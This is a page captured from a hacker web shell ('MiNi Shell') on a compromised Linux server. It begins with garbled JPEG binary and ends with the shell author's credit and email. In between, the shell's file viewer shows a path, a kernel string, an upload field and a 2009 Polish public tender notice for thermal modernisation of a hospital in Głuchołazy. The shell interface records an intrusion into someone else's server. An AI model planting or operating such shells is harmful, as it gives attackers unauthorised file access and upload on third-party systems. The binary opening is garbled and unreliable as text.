JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/132399-N-2009.html

<p class="kh_header"><b>Głuchołazy: Termomodernizacja  budynku  - część 2 Szpitala nr 1 przy ul. M. C. Skłodowskiej  16 w Głuchołazach</b><br>
<b>Numer ogłoszenia: 132399 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Zespół Opieki Zdrowotnej , ul. M. C. Skłodowskiej 16, 48-340 Głuchołazy, woj. opolskie, tel. 077 4391326, faks 077 4391326.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja  budynku  - część 2 Szpitala nr 1 przy ul. M. C. Skłodowskiej  16 w Głuchołazach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią :
Termomodernizacja budynku część 2 Szpitala nr 1 przy ul. M.C. Skłodowskiej 16 w Głuchołazach robót  w części objętych specyfikacją, kosztorysem , przedmiarem i dokumentacja techniczną w zakresie :
- wykonanie elewacji w części nie wymagającej ocieplenia ścian 
- wymiana stolarki okiennej w zakresie j. w.
 - montaż rur spustowych w zakresie j. w.
- montaż instalacji odgromowej w zakresie j.w.

Specyfikacje  techniczne - załącznik nr 7
Przedmiar robót - załącznik nr 8
Dokumentacja Projektowa - załącznik nr 9


Kod CPV: 45 11 10 00-8, 45 42 11 00-5, 45 26 00 00 -7, 45 45 40 00-4, 

Warunki realizacji :
 Wykonawca jest zobowiązany dopełnić wszelkich formalności wymaganych przepisami prawa budowlanego koniecznych do rozpoczęcia użytkowania przedmiotu zamówienia. Wykonawstwo winno być zgodne ze Specyfikacjami Technicznymi Wykonania i odbioru robót Budowlanych i przedmiarem robót będących częścią Dokumentacji projektowej.
Techniki , technologie oraz materiały opisane w w/w dokumentacji stanowią minimalne wymagania techniczne. Wykonawca winien zabezpieczyć realizacje wskazanych technikami, technologiami i materiałami lub równoważnymi. 
Wykonawca winien sporządzić i załączyć do oferty propozycje harmonogramu robót,  który po zweryfikowaniu i zatwierdzeniu przez inspektora nadzoru stanowić  będzie załącznik do umowy.

Gwarancje : 
Wykonawca winien udzielić 60 miesięcznej gwarancji i rękojmi na całość przedmiotu zamówienia. Bieg terminu gwarancji i rękojmi będzie  liczony od dnia protokolarnego odbioru końcowego robót wykonanych należycie

Wizja lokalna:
Wykonawca winien dokonać wizji lokalnej i zapoznać się z rzeczywistymi warunkami realizacji zamówienia w stosunku do zapisów Przedmiaru Robót stanowiących załącznik nr .... do SIWZ. W tym celu do oferty winien załączyć oświadczenie o jej dokonaniu, potwierdzone  przez upoważnionego przedstawiciela    ze strony Zamawiającego. Wzór oświadczenia stanowi załącznik nr 6 do SIWZ. W przypadku stwierdzenia jakichkolwiek nieścisłości Wykonawca winien zwrócić się  o ich wyjaśnienie w formie zapytania do Zamawiającego.

Możliwość dokonania zmian  umowy:
Dopuszcza się możliwość zmiany terminu wykonania przedmiotu zamówienia , jeśli dochowanie terminu pierwotnego  nie będzie możliwe z powodu złych warunków atmosferycznych. Zmiana ta może nastąpić tylko raz.
  	

Zamawiający nie dopuszcza możliwości składania ofert częściowych.
Zamawiający nie przewiduje zawarcie umowy ramowej
Zamawiający nie przewiduje możliwości udzielenia zamówień  uzupełniających, uzupełniających których  mowa w art. 67 ust 1 pkt 6 
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający  nie przewiduje przeprowadzenia aukcji elektronicznej.
W przypadku powierzenia realizacji części zamówienia  podwykonawcom , Wykonawca winien wskazać, której części to dotyczy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.42.11.00-5, 45.26.00.00-7, 45.45.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1   Wykonawca winien wnieść wadium w wysokości 5 000,00, słownie - pięć tysięcy zł 
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu,
b.	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn zm.).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 

Bank Zachodni WBK I Oddział Głuchołazy nr rachunku: 98 1090 2167 0000 0005 6201 0449

4.	Wadium wnoszone w innej formie niż pieniężna należy złożyć w Administracji SP ZOZ ZOZ w Głuchołazach przy ul. Rynek 12-14 w dziale Księgowości   III piętro.
5.	Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
6.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
a.	upłynął termin związania ofertą;
b.	zawarto umowę w sprawie zamówienia publicznego 
c.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia
7.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a.	który wycofał ofertę przed upływem terminu składania ofert;
b.	który został wykluczony z postępowania;
c.	którego oferta została odrzucona
8.	Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego 
z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
9.	Zamawiający żąda ponownie wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygniecie protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
c.	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 lub pełnomocnictw, chyba że udowodni ,że wynika to z przyczyn nieleżących po jego stronie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymagania na podstawie art. 22 ustawy Pzp, oraz nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ustawy Pzp.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp.
3. Z postępowania o udzielenie zamówienia wyklucza się wykonawców, którzy nie spełniają
warunków, o których mowa w art. 24 ust.1 i ust.2 ustawy Prawo zamówień publicznych.
4. Ocena spełniania warunków określonych dla Wykonawców zostanie dokonana na podstawie analizy wymaganych w specyfikacji dokumentów i oświadczeń, przy zastosowaniu kryterium spełnia, nie spełnia. Oferta spełniająca warunki otrzyma ocenę spełnia, oferta nie spełniająca warunków otrzyma ocenę nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Każdy z Wykonawców przystępujący do przetargu zobowiązany jest złożyć:
a/  pełnomocnictwo do podpisywania oferty - nie jest wymagane, jeżeli podpisujący jest lub są właścicielami firmy lub, jeżeli są wymienieni z imienia i nazwiska w odnośnym dokumencie rejestracyjnym,
b/ Oświadczenie Wykonawcy w związku z art. 22 i 24 ustawy Pzp o spełnieniu warunków udziału w postępowaniu (załącznik nr 2do SIWZ),
c/ Zaakceptowany wzór umowy przez osobę reprezentującą  Wykonawcę. Dla przejrzystości dokumentu zaleca się (bez obowiązku) wypełnienie we wzorze umowy miejsc wykropkowanych ( załącznik nr 3 do SIWZ).
d/ Aktualny odpis lub kserokopia potwierdzona za zgodność z oryginałem  z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 e/ Aktualne zaświadczenie lub kserokopia potwierdzona za zgodność z oryginałem  właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
f/ polisę, a w przypadku jej braku inny dokument potwierdzający, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę odpowiadającej co najmniej wartości złożonej oferty.
g/  wykaz wykonanych min. 3 robót budowlanych w latach 2007-2009   co najmniej jednej na kwotę min. 1,6 mln zl, i drugiej  na kwotę nie mniejsza niż  1 mln zł brutto , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie objętym niniejszym zamówieniem z podaniem ich wartości, przedmiotu, dat i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik nr 4 do SIWZ
h/  Osoba z uprawnieniami budowlanymi do kierowania robotami budowlanymi w zakresie konstrukcyjno - budowlanym  wraz z  aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa.
i/ wykaz osób , które uczestniczyć będą w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, -  załącznik nr  5 do SIWZ 
j/ Harmonogram rzeczowy robót ,
k/ Kosztorys szczegółowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz.glucholazy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny
Zakład Opieki Zdrowotnej Zespół Opieki Zdrowotnej
Zamówienia Publiczne.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2009 godzina 11:00, miejsce: Samodzielny Publiczny
Zakład Opieki Zdrowotnej Zespół Opieki Zdrowotnej
Sekretariat 
przy ul. Skłodowskiej 16, 48-340 Głuchołazy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com